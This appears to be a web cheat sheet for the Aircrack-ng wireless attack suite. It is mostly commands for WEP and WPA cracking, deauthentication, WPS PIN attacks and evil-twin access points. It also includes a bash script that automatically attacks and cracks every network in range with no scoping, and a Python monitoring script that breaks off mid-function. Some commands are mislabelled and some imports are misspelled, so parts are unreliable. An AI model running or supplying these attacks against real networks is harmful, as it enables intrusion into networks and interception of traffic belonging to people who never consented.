Appearance
Aircrack-ng Cheat Sheet
Overview
Aircrack-ng is a comprehensive suite of wireless network security assessment tools designed for auditing WiFi networks and testing wireless security implementations. Originally developed as a fork of the original Aircrack project, Aircrack-ng has evolved into the de facto standard for wireless penetration testing and security research. The suite includes multiple specialized tools that work together to provide complete wireless network assessment capabilities, from packet capture and injection to encryption key recovery and access point manipulation.
The Aircrack-ng suite consists of several core components: airodump-ng for wireless packet capture and network discovery, aireplay-ng for packet injection and attack implementation, aircrack-ng for WEP and WPA/WPA2 key recovery, and airmon-ng for wireless interface management and monitor mode configuration. Additional tools include airdecap-ng for decrypting captured packets, packetforge-ng for creating custom packets, and airbase-ng for creating fake access points. This modular approach allows security professionals to perform targeted assessments and customize their testing methodology based on specific requirements.
The framework supports a wide range of wireless security protocols and attack vectors, including WEP cracking through statistical analysis, WPA/WPA2 handshake capture and dictionary attacks, WPS PIN attacks, and various injection attacks for testing network resilience. Aircrack-ng is particularly valuable for identifying weak encryption implementations, testing access point configurations, and validating wireless security policies. With its active development community and extensive documentation, Aircrack-ng remains an essential tool for wireless security professionals, penetration testers, and network administrators responsible for securing wireless infrastructure.
Installation
Ubuntu/Debian Installation
Installing Aircrack-ng on Ubuntu/Debian systems:
bash
# Update system packages
sudo apt update && sudo apt upgrade -y
# Install Aircrack-ng from repositories
sudo apt install -y aircrack-ng
# Install additional dependencies
sudo apt install -y wireless-tools net-tools iw rfkill pcap-utils \
build-essential autoconf automake libtool pkg-config libnl-3-dev \
libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev \
libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev \
hostapd wpasupplicant tcpdump screen iw usbutils pciutils
# Verify installation
aircrack-ng --help
airodump-ng --help
aireplay-ng --help
# Check wireless interface capabilities
sudo airmon-ng
# Install latest version from source (optional)
cd /tmp
wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz
tar -xzf aircrack-ng-1.7.tar.gz
cd aircrack-ng-1.7
# Configure and compile
autoreconf -i
./configure --with-experimental
make -j$(nproc)
sudo make install
sudo ldconfig
# Verify source installation
aircrack-ng --versionCentOS/RHEL Installation
bash
# Install EPEL repository
sudo yum install -y epel-release
# Install required packages
sudo yum groupinstall -y "Development Tools"
sudo yum install -y wireless-tools iw rfkill pcap-devel openssl-devel \
sqlite-devel pcre-devel hwloc-devel cmocka-devel libnl3-devel \
autoconf automake libtool pkg-config ethtool
# Install Aircrack-ng from EPEL
sudo yum install -y aircrack-ng
# Alternative: Install from source
cd /tmp
wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz
tar -xzf aircrack-ng-1.7.tar.gz
cd aircrack-ng-1.7
autoreconf -i
./configure --with-experimental
make -j$(nproc)
sudo make install
# Configure firewall
sudo firewall-cmd --permanent --add-port=67/udp
sudo firewall-cmd --permanent --add-port=68/udp
sudo firewall-cmd --reloadmacOS Installation
bash
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Aircrack-ng
brew install aircrack-ng
# Install additional tools
brew install wireshark tcpdump
# Verify installation
aircrack-ng --version
# Note: macOS requires compatible USB WiFi adapter for monitor mode
# Built-in WiFi adapters typically don't support monitor modeKali Linux Installation
bash
# Aircrack-ng is pre-installed on Kali Linux
# Update to latest version
sudo apt update
sudo apt install -y aircrack-ng
# Install additional wireless tools
sudo apt install -y reaver bully wifite hostapd-wpe freeradius-wpe \
asleap john hashcat hcxtools hcxdumptool
# Verify installation
aircrack-ng --versionDocker Installation
Running Aircrack-ng in Docker:
bash
# Create Dockerfile for Aircrack-ng
cat > Dockerfile.aircrack << 'EOF'
FROM ubuntu:22.04
# Install dependencies
RUN apt-get update && apt-get install -y \
aircrack-ng wireless-tools iw rfkill \
tcpdump net-tools usbutils pciutils \
&& rm -rf /var/lib/apt/lists/*
# Create working directory
WORKDIR /data
# Default command
CMD ["aircrack-ng", "--help"]
EOF
# Build Docker image
docker build -f Dockerfile.aircrack -t aircrack-ng .
# Run with USB device access (for USB WiFi adapters)
docker run -it --rm --privileged \
-v $(pwd):/data \
--device=/dev/bus/usb \
aircrack-ng
# Run specific Aircrack-ng command
docker run -it --rm --privileged \
-v $(pwd):/data \
aircrack-ng \
airodump-ng --helpBasic Usage
Interface Management
Managing wireless interfaces and monitor mode:
bash
# Check wireless interfaces
sudo airmon-ng
# Check interface details
iwconfig
sudo iw dev
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Check monitor mode interface (usually wlan0mon)
iwconfig
# Change channel
sudo iwconfig wlan0mon channel 6
sudo iw dev wlan0mon set channel 6
# Set specific frequency
sudo iw dev wlan0mon set freq 2437
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Restart network services
sudo systemctl restart NetworkManager
sudo systemctl restart wpa_supplicantNetwork Discovery
Discovering wireless networks and clients:
bash
# Basic network scan
sudo airodump-ng wlan0mon
# Scan specific channel
sudo airodump-ng -c 6 wlan0mon
# Scan specific BSSID
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon
# Write capture to file
sudo airodump-ng -w capture wlan0mon
# Show only WEP networks
sudo airodump-ng --encrypt WEP wlan0mon
# Show only WPA networks
sudo airodump-ng --encrypt WPA wlan0mon
# Scan with manufacturer lookup
sudo airodump-ng -M wlan0mon
# Scan specific frequency range
sudo airodump-ng --band a wlan0mon # 5GHz
sudo airodump-ng --band bg wlan0mon # 2.4GHz
# Advanced scanning options
sudo airodump-ng -c 1-13 --band bg -w scan_results wlan0mon
# Monitor specific network and clients
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0monWEP Attacks
WEP encryption attacks and key recovery:
bash
# Capture WEP traffic
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
# ARP replay attack (in new terminal)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Fake authentication (if needed)
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# ChopChop attack
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
# Interactive packet replay
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
# Crack WEP key (run when sufficient IVs collected)
aircrack-ng wep_capture-01.cap
# Crack with specific key length
aircrack-ng -n 64 wep_capture-01.cap # 64-bit WEP
aircrack-ng -n 128 wep_capture-01.cap # 128-bit WEP
# Use custom wordlist
aircrack-ng -w wordlist.txt wep_capture-01.capWPA/WPA2 Attacks
WPA/WPA2 handshake capture and cracking:
bash
# Capture WPA handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
# Deauthentication attack to force handshake (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Target specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:AA:BB wlan0mon
# Verify handshake capture
aircrack-ng wpa_capture-01.cap
# Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
# Crack specific BSSID
aircrack-ng -b AA:BB:CC:DD:EE:FF -w wordlist.txt wpa_capture-01.cap
# Use custom wordlist with rules
aircrack-ng -w custom_wordlist.txt wpa_capture-01.cap
# Crack with ESSID
aircrack-ng -e "NetworkName" -w wordlist.txt wpa_capture-01.cap
# Show handshake without cracking
aircrack-ng -J hashcat_format wpa_capture-01.cap
# Convert to hashcat format
aircrack-ng -J hashcat_hashes wpa_capture-01.cap
hashcat -m 2500 hashcat_hashes.hccapx wordlist.txtWPS Attacks
WPS (WiFi Protected Setup) attacks:
bash
# Scan for WPS-enabled networks
sudo airodump-ng --wps wlan0mon
# Reaver WPS PIN attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Reaver with specific options
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -c 6
# Bully WPS attack
sudo bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# Pixie dust attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
# WPS PIN generation
sudo aircrack-ng -W pin_list.txt
# Check WPS lock status
sudo wash -i wlan0monAdvanced Features
Custom Packet Injection
Creating and injecting custom packets:
bash
# Create custom ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -k 192.168.1.1 -l 192.168.1.100 -y fragment.xor -w arp_packet
# Inject custom packet
sudo aireplay-ng -2 -r arp_packet wlan0mon
# Create custom authentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w auth_packet
# Create deauthentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w deauth_packet
# Replay captured packet
sudo aireplay-ng -2 -r captured_packet.cap wlan0mon
# Interactive packet replay with modifications
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -m 68 -n 86 wlan0monAccess Point Creation
Creating fake access points and evil twin attacks:
bash
# Create open access point
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
# Create WEP access point
sudo airbase-ng -e "SecureWiFi" -c 6 -W 1 -z 2 -Z 4 wlan0mon
# Create access point with specific BSSID
sudo airbase-ng -e "TestAP" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
# Evil twin attack (clone existing AP)
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
# Capture clients connecting to fake AP
sudo airbase-ng -e "FreeWiFi" -c 6 -P -C 30 wlan0mon
# Create multiple access points
sudo airbase-ng -e "AP1" -e "AP2" -e "AP3" -c 6 wlan0mon
# Advanced evil twin with DHCP
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon &
sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
# Start DHCP server for fake AP
sudo dnsmasq -C /dev/null -kd -F 192.168.1.100,192.168.1.200 -i at0 --bind-dynamicAdvanced Cracking Techniques
Advanced password cracking and optimization:
bash
# Multi-threaded cracking
aircrack-ng -w wordlist.txt -p 4 capture.cap
# Cracking with custom character set
crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -w - capture.cap
# Using John the Ripper with Aircrack-ng
aircrack-ng -J john_format capture.cap
john --wordlist=wordlist.txt john_format.hccap
# Hashcat integration
aircrack-ng -J hashcat_format capture.cap
hashcat -m 2500 -a 0 hashcat_format.hccapx wordlist.txt
# GPU-accelerated cracking with hashcat
hashcat -m 2500 -a 3 -w 3 hashcat_format.hccapx ?d?d?d?d?d?d?d?d
# Mask attack with hashcat
hashcat -m 2500 -a 3 hashcat_format.hccapx ?u?l?l?l?l?l?d?d
# Rule-based attack
hashcat -m 2500 -a 0 -r rules/best64.rule hashcat_format.hccapx wordlist.txt
# Combination attack
hashcat -m 2500 -a 1 hashcat_format.hccapx wordlist1.txt wordlist2.txt
# Distributed cracking setup
# On master node:
hashcat -m 2500 -a 0 --session=distributed hashcat_format.hccapx wordlist.txt
# On worker nodes:
hashcat -m 2500 -a 0 --session=worker1 --restore-file-path=distributed.restore hashcat_format.hccapx wordlist.txtPacket Analysis and Decryption
Analyzing and decrypting captured packets:
bash
# Decrypt WEP packets
airdecap-ng -w 1234567890 wep_capture.cap
# Decrypt WPA packets with passphrase
airdecap-ng -p passphrase -e "NetworkName" wpa_capture.cap
# Decrypt with PMK
airdecap-ng -k pmk_file wpa_capture.cap
# Extract specific packet types
airdecap-ng -t 1 capture.cap # Extract only data packets
# Analyze packet statistics
aircrack-ng -s capture.cap
# Show packet details
tcpdump -r decrypted_capture-dec.cap -v
# Convert to other formats
tshark -r capture.cap -w converted.pcapng
# Extract files from decrypted traffic
tcpflow -r decrypted_capture-dec.cap
# Analyze with Wireshark
wireshark decrypted_capture-dec.capAutomation Scripts
Comprehensive WiFi Assessment Script
bash
#!/bin/bash
# Comprehensive WiFi security assessment script
# Configuration
INTERFACE="wlan0"
MONITOR_INTERFACE=""
SCAN_TIME="60"
ATTACK_TIME="300"
OUTPUT_DIR="/tmp/wifi_assessment_$(date +%Y%m%d_%H%M%S)"
WORDLIST="/usr/share/wordlists/rockyou.txt"
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Logging function
log_message() {
echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" | tee -a "$OUTPUT_DIR/assessment.log"
}
# Cleanup function
cleanup() {
log_message "Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE" >/dev/null 2>&1
fi
# Restart network services
sudo systemctl restart NetworkManager >/dev/null 2>&1
# Kill background processes
sudo pkill -f airodump-ng
sudo pkill -f aireplay-ng
sudo pkill -f aircrack-ng
log_message "Cleanup completed"
}
# Signal handlers
trap cleanup EXIT
trap cleanup INT
trap cleanup TERM
# Check if running as root
check_root() {
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
}
# Check dependencies
check_dependencies() {
log_message "Checking dependencies..."
local deps=("aircrack-ng" "airodump-ng" "aireplay-ng" "airmon-ng")
for dep in "${deps[@]}"; do
if ! command -v "$dep" >/dev/null 2>&1; then
log_message "ERROR: $dep not found"
exit 1
fi
done
if [ ! -f "$WORDLIST" ]; then
log_message "WARNING: Wordlist not found at $WORDLIST"
WORDLIST=""
fi
log_message "Dependencies check passed"
}
# Setup monitor mode
setup_monitor_mode() {
log_message "Setting up monitor mode on $INTERFACE..."
# Kill interfering processes
sudo airmon-ng check kill >/dev/null 2>&1
# Start monitor mode
local output
output=$(sudo airmon-ng start "$INTERFACE" 2>&1)
# Extract monitor interface name
MONITOR_INTERFACE=$(echo "$output" | grep -o "${INTERFACE}mon\|mon[0-9]" | head -n 1)
if [ -z "$MONITOR_INTERFACE" ]; then
MONITOR_INTERFACE="${INTERFACE}mon"
fi
# Verify monitor mode
if iwconfig "$MONITOR_INTERFACE" 2>/dev/null | grep -q "Mode:Monitor"; then
log_message "Monitor mode enabled on $MONITOR_INTERFACE"
else
log_message "ERROR: Failed to enable monitor mode"
exit 1
fi
}
# Network discovery
network_discovery() {
log_message "Starting network discovery for $SCAN_TIME seconds..."
local scan_file="$OUTPUT_DIR/network_scan"
# Start airodump-ng in background
sudo airodump-ng -w "$scan_file" --output-format csv "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait for scan time
sleep "$SCAN_TIME"
# Stop airodump-ng
sudo kill $airodump_pid 2>/dev/null
# Parse results
if [ -f "${scan_file}-01.csv" ]; then
log_message "Networks discovered:"
# Parse CSV and display networks
tail -n +2 "${scan_file}-01.csv" | head -n -3 | while IFS=',' read -r bssid first_seen last_seen channel speed privacy cipher auth power beacons iv lan_ip id_length essid key; do
if [ -n "$bssid" ] && [ "$bssid" != "BSSID" ]; then
essid=$(echo "$essid" | tr -d ' ')
if [ -n "$essid" ]; then
log_message " BSSID: $bssid, ESSID: $essid, Channel: $channel, Encryption: $privacy"
# Save target info
echo "$bssid,$essid,$channel,$privacy" >> "$OUTPUT_DIR/targets.txt"
fi
fi
done
else
log_message "No networks discovered"
fi
}
# WEP attack
wep_attack() {
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WEP attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wep_${essid}_$(echo $bssid | tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Try fake authentication
sudo aireplay-ng -1 0 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local auth_pid=$!
# ARP replay attack
sudo aireplay-ng -3 -b "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local arp_pid=$!
# Wait for attack time
sleep "$ATTACK_TIME"
# Stop attacks
sudo kill $airodump_pid $auth_pid $arp_pid 2>/dev/null
# Try to crack
if [ -f "${capture_file}-01.cap" ]; then
log_message "Attempting to crack WEP key for $essid..."
local crack_result
crack_result=$(timeout 60 aircrack-ng "${capture_file}-01.cap" 2>/dev/null)
if echo "$crack_result" | grep -q "KEY FOUND"; then
local key=$(echo "$crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1)
log_message "SUCCESS: WEP key found for $essid: $key"
echo "$bssid,$essid,WEP,$key" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Failed to crack WEP key for $essid"
fi
fi
}
# WPA attack
wpa_attack() {
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WPA attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wpa_${essid}_$(echo $bssid | tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Deauthentication attack to capture handshake
for i in {1..5}; do
sudo aireplay-ng -0 10 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1
sleep 10
done
# Stop capture
sudo kill $airodump_pid 2>/dev/null
# Check for handshake
if [ -f "${capture_file}-01.cap" ]; then
local handshake_check
handshake_check=$(aircrack-ng "${capture_file}-01.cap" 2>/dev/null | grep "1 handshake")
if [ -n "$handshake_check" ]; then
log_message "Handshake captured for $essid"
# Try to crack with wordlist
if [ -n "$WORDLIST" ] && [ -f "$WORDLIST" ]; then
log_message "Attempting to crack WPA key for $essid with wordlist..."
local crack_result
crack_result=$(timeout 300 aircrack-ng -w "$WORDLIST" -b "$bssid" "${capture_file}-01.cap" 2>/dev/null)
if echo "$crack_result" | grep -q "KEY FOUND"; then
local key=$(echo "$crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1)
log_message "SUCCESS: WPA key found for $essid: $key"
echo "$bssid,$essid,WPA,$key" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Failed to crack WPA key for $essid with wordlist"
echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt"
fi
else
log_message "No wordlist available for WPA cracking"
echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt"
fi
else
log_message "No handshake captured for $essid"
fi
fi
}
# WPS attack
wps_attack() {
local bssid="$1"
local essid="$2"
local channel="$3"
log_message "Starting WPS attack against $essid ($bssid)"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Check if reaver is available
if command -v reaver >/dev/null 2>&1; then
# Try Pixie Dust attack first
log_message "Attempting Pixie Dust attack on $essid..."
local pixie_result
pixie_result=$(timeout 120 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -K -vv 2>/dev/null)
if echo "$pixie_result" | grep -q "WPS PIN:"; then
local pin=$(echo "$pixie_result" | grep "WPS PIN:" | cut -d':' -f2 | tr -d ' ')
local psk=$(echo "$pixie_result" | grep "WPA PSK:" | cut -d':' -f2 | tr -d ' ')
log_message "SUCCESS: WPS PIN found for $essid: $pin"
log_message "SUCCESS: WPA PSK found for $essid: $psk"
echo "$bssid,$essid,WPS,$pin,$psk" >> "$OUTPUT_DIR/cracked_keys.txt"
else
log_message "Pixie Dust attack failed for $essid"
# Try regular WPS PIN attack (limited time)
log_message "Attempting WPS PIN brute force on $essid..."
timeout 300 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -vv >/dev/null 2>&1
fi
else
log_message "Reaver not available for WPS attacks"
fi
}
# Attack networks
attack_networks() {
log_message "Starting attacks on discovered networks..."
if [ ! -f "$OUTPUT_DIR/targets.txt" ]; then
log_message "No targets found"
return
fi
while IFS=',' read -r bssid essid channel encryption; do
if [ -n "$bssid" ]; then
log_message "Attacking $essid ($bssid) - $encryption"
case "$encryption" in
*"WEP"*)
wep_attack "$bssid" "$essid" "$channel"
;;
*"WPA"*)
wpa_attack "$bssid" "$essid" "$channel"
# Also try WPS if available
wps_attack "$bssid" "$essid" "$channel"
;;
*"OPN"*)
log_message "Open network detected: $essid"
echo "$bssid,$essid,OPEN,NO_PASSWORD" >> "$OUTPUT_DIR/open_networks.txt"
;;
esac
fi
done < "$OUTPUT_DIR/targets.txt"
}
# Generate report
generate_report() {
log_message "Generating assessment report..."
local report_file="$OUTPUT_DIR/wifi_assessment_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>WiFi Security Assessment Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.section { margin: 20px 0; padding: 15px; border: 1px solid #ddd; }
.success { color: green; font-weight: bold; }
.warning { color: orange; font-weight: bold; }
.error { color: red; font-weight: bold; }
table { border-collapse: collapse; width: 100%; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f2f2f2; }
pre { background: #f5f5f5; padding: 10px; overflow-x: auto; }
</style>
</head>
<body>
<h1>WiFi Security Assessment Report</h1>
<p>Generated: $(date)</p>
<p>Interface: $INTERFACE ($MONITOR_INTERFACE)</p>
<p>Scan Duration: $SCAN_TIME seconds</p>
<p>Attack Duration: $ATTACK_TIME seconds per target</p>
<div class="section">
<h2>Executive Summary</h2>
EOF
# Count results
local total_networks=0
local cracked_networks=0
local open_networks=0
local handshakes=0
if [ -f "$OUTPUT_DIR/targets.txt" ]; then
total_networks=$(wc -l < "$OUTPUT_DIR/targets.txt")
fi
if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then
cracked_networks=$(wc -l < "$OUTPUT_DIR/cracked_keys.txt")
fi
if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then
open_networks=$(wc -l < "$OUTPUT_DIR/open_networks.txt")
fi
if [ -f "$OUTPUT_DIR/handshakes.txt" ]; then
handshakes=$(wc -l < "$OUTPUT_DIR/handshakes.txt")
fi
cat >> "$report_file" << EOF
<ul>
<li>Total networks discovered: $total_networks</li>
<li>Networks with compromised security: $cracked_networks</li>
<li>Open networks: $open_networks</li>
<li>WPA handshakes captured: $handshakes</li>
</ul>
</div>
<div class="section">
<h2>Discovered Networks</h2>
<table>
<tr><th>BSSID</th><th>ESSID</th><th>Channel</th><th>Encryption</th></tr>
EOF
if [ -f "$OUTPUT_DIR/targets.txt" ]; then
while IFS=',' read -r bssid essid channel encryption; do
echo " <tr><td>$bssid</td><td>$essid</td><td>$channel</td><td>$encryption</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/targets.txt"
fi
cat >> "$report_file" << EOF
</table>
</div>
<div class="section">
<h2>Security Vulnerabilities</h2>
EOF
if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then
echo " <h3 class=\"error\">Compromised Networks</h3>" >> "$report_file"
echo " <table>" >> "$report_file"
echo " <tr><th>BSSID</th><th>ESSID</th><th>Type</th><th>Key/PIN</th></tr>" >> "$report_file"
while IFS=',' read -r bssid essid type key; do
echo " <tr><td>$bssid</td><td>$essid</td><td>$type</td><td>$key</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/cracked_keys.txt"
echo " </table>" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then
echo " <h3 class=\"warning\">Open Networks</h3>" >> "$report_file"
echo " <table>" >> "$report_file"
echo " <tr><th>BSSID</th><th>ESSID</th></tr>" >> "$report_file"
while IFS=',' read -r bssid essid type status; do
echo " <tr><td>$bssid</td><td>$essid</td></tr>" >> "$report_file"
done < "$OUTPUT_DIR/open_networks.txt"
echo " </table>" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
<div class="section">
<h2>Assessment Log</h2>
<pre>$(cat "$OUTPUT_DIR/assessment.log")</pre>
</div>
</body>
</html>
EOF
log_message "Report generated: $report_file"
}
# Main execution
main() {
log_message "Starting WiFi security assessment"
check_root
check_dependencies
setup_monitor_mode
network_discovery
attack_networks
generate_report
log_message "Assessment completed. Results in: $OUTPUT_DIR"
}
# Parse command line arguments
while [[ $# -gt 0 ]]; do
case $1 in
-i|--interface)
INTERFACE="$2"
shift 2
;;
-s|--scan-time)
SCAN_TIME="$2"
shift 2
;;
-a|--attack-time)
ATTACK_TIME="$2"
shift 2
;;
-w|--wordlist)
WORDLIST="$2"
shift 2
;;
-h|--help)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " -i, --interface IFACE Wireless interface (default: wlan0)"
echo " -s, --scan-time SECONDS Network discovery time (default: 60)"
echo " -a, --attack-time SECONDS Attack time per target (default: 300)"
echo " -w, --wordlist FILE Wordlist for WPA cracking"
echo " -h, --help Show this help"
exit 0
;;
*)
echo "Unknown option: $1"
exit 1
;;
esac
done
# Run main function
mainIntegration Examples
Continuous Monitoring Script
python
#!/usr/bin/env python3
# Aircrack-ng continuous monitoring and alerting
import subprocess
import time
import json
import smtplib
import logging
from datetime import datetime
from email.mime.text import MimeText
from email.mime.multipart import MimeMultipart
class WiFiMonitor:
def __init__(self, config):
self.config = config
self.interface = config.get('interface', 'wlan0mon')
self.scan_interval = config.get('scan_interval', 300) # 5 minutes
self.known_networks = set()
self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/wifi_monitor.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def scan_networks(self):
"""Scan for wireless networks"""
try:
# Run airodump-ng for a short scan
cmd = [
'timeout', '30',
'airodump-ng', '--output-format', 'csv',
'-w', '/tmp/wifi_scan', self.interface
]
subprocess.run(cmd, capture_output=True, text=True)
# Parse results
networks = self.parse_scan_results('/tmp/wifi_scan-01.csv')
return networks
except Exception as e:
self.logger.error(f"Error scanning networks: {e}")
return []
def parse_scan_results(self, csv_file):
"""Parse airodump-ng CSV output"""
networks = []
try:
with open(csv_file, 'r') as f:
lines = f.readlines()
# Find the start of network data
start_idx = 0
for i, line in enumerate(lines):
if line.startswith('BSSID'):
start_idx = i + 1
break
# Parse network entries
for line in lines[start_idx:]:
if line.strip() and not line.startswith('Station MAC'):
parts = line.split(',')
if len(parts) >= 14:
network = {
'bssid': parts[0].strip(),
'first_seen': parts[1].strip(),
'last_seen': parts[2].strip(),
'channel': parts[3].strip(),
'speed': parts[4].strip(),
'privacy': parts[5].strip(),
'cipher': parts[6].strip(),
'authentication': parts[7].strip(),
'power': parts[8].strip(),
'beacons': parts[9].strip(),
'iv': parts[10].strip(),
'lan_ip': parts[11].strip(),
'id_length': parts[12].strip(),
'essid': parts[13].strip(),
'timestamp': datetime.now().isoformat()
}
if network['bssid'] and network['essid']:
networks.append(network)
except FileNotFoundError:
self.logger.warning(f"Scan results file not found: {csv_file}")
except Exception as e:
self.logger.error(f"Error parsing scan results: {e}")
return networks
def detect_anomalies(self, networks):
"""Detect suspicious network activity"""
alerts = []
for network in networks:
network_id = f"{network['bssid']}_{network['essid']}"
# Check for new networks
if network_id not in self.known_networks:
self.known_networks.add(network_id)
# Alert on suspicious network names
suspicious_names = [
'free', 'wifi', 'internet', 'guest', 'public',
'linksys', 'netgear', 'dlink', 'default'
]
essid_lower = network['essid'].lower()
if any(name in essid_lower for name in suspicious_names):
alerts.append({
'type': 'suspicious_network',
'severity': 'medium',
'message': f"Suspicious network detected: {network['essid']} ({network['bssid']})",
'network': network
})
# Alert on open networks
if 'OPN' in network['privacy']:
alerts.append({
'type': 'open_network',
'severity': 'low',
'message': f"Open network detected: {network['essid']} ({network['bssid']})",
'network': network
})
# Alert on WEP networks
if 'WEP' in network['privacy']:
alerts.append({
'type': 'weak_encryption',
'severity': 'high',
'message': f"WEP network detected: {network['essid']} ({network['bssid']})",
'network': network
})
# Alert on potential evil twins
for known_network in self.known_networks:
if known_network != network_id:
known_essid = known_network.split('_', 1)[1]
if known_essid == network['essid']:
alerts.append({
'type': 'potential_evil_twin',
'severity': 'high',
'message': f"Potential evil twin detected: {network['essid']} ({network['bssid']})",
'network': network
})
# Check for high power levels (potential rogue AP)
try:
power = int(network['power'])
if power > -30: # Very high signal strength
alerts.append({
'type': 'high_power_ap',
'severity': 'medium',
'message': f"High power AP detected: {network['essid']} ({network['bssid']}) - Power: {power}dBm",
'network': network
})
except ValueError:
pass
return alerts
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT [{alert['severity'].upper()}]: {alert['message']}")
# Send email if configured
if self.config.get('email', {}).get('enabled', False):
self.send_email_alert(alert)
# Send to SIEM if configured
if self.config.get('siem', {}).get('enabled', False):
self.send_siem_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
try:
email_config = self.config['email']
msg = MimeMultipart()
msg['From'] = email_config['from']
msg['To'] = email_config['to']
